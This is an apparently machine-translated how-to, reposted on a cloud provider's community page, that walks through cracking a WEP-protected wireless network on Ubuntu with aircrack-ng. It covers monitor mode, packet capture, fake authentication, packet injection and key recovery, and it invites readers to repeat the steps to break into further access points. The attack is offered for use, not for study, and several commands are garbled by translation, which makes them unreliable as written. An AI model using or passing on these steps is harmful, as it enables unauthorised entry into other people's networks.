Crack wireless networks in Ubuntu and crack wireless networks in ubuntu

Source: Internet
Author: User

Crack wireless networks in Ubuntu and crack wireless networks in ubuntu

1. Install ubuntu and aircrack-ng
First install Ubuntu and update the system to the latest version.
Enter sudo apt-get install aircrack-ng in the terminal to install aircrack-ng.
If you are not connected to the Internet, go to another computer and download the aircrack-ng Ubuntu DEB installation package.
: Http://packages.ubuntu.com/zh-cn/jaunty/i386/aircrack-ng/download

 

Ii. Cracking Process
1. start the monitoring mode of the wireless network card. Enter sudo airmon-ng start wlan0 in the terminal.
(Wlan0 is the port of the wireless network card. You can enter ifconfig in the terminal to view the port)

2. View Wireless AP input in the terminal:
Sudo airodump-ng mon0
(Note: After the monitoring mode is enabled, the wireless network port is now mon0 !!!)
Check which wep-encrypted AP is online, press ctrl + c to exit, and keep the terminal

3. packet capture
Open another terminal and enter:
Sudo airodump-ng-c 6 -- bssid AP's MAC-w wep mon0
(6 followed by-c is the AP working channel to be cracked, -- the AP 'smac followed by bissid is the MAC address of the AP to be cracked, -w is followed by wep, which is the file name for storing captured DATA packets. Change the channel and MAC address according to the online AP in step 2. The file name for storing DATA can be named as needed)

4. Establish a virtual connection with the AP
Open another terminal and enter:
Sudo aireplay-ng-1 0-a AP's MAC-h My MAC mon0
(My MAC following-h is the MAC address of your wireless network card. command:
Iwlist wlan0 scanning
You can view your MAC address. Your MAC address is the mac address of wlan0 under the ifconfig command)

5. Inject
After a virtual connection is established, enter:
Sudo aireplay-ng-2-F-p 0841-c ff: ff-B AP's MAC-h My MAC mon0
Now let's look back at whether the terminal in step 3 is starting to soar! (Just copy the string ff)

6. decryption
After collecting more than 15000 pieces of DATA, open another terminal and enter:
Sudo aircrack-ng wep *. cap
Decryption
(If not, continue to wait. aircrack-ng will automatically run after each additional 15000 DATA entries until the calculated password is, note that the file name must be the same as the name set in step 3, and the * number is required)

7. Close
After the password is cracked, enter sudo airmon-ng stop mon0 in the terminal to disable the monitoring mode. Otherwise, the wireless network adapter will continue injecting the password to the AP, you cannot exit or directly close the terminal by using ctrl + c. Now you can surf, or repeat 1-7 to crack its AP.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.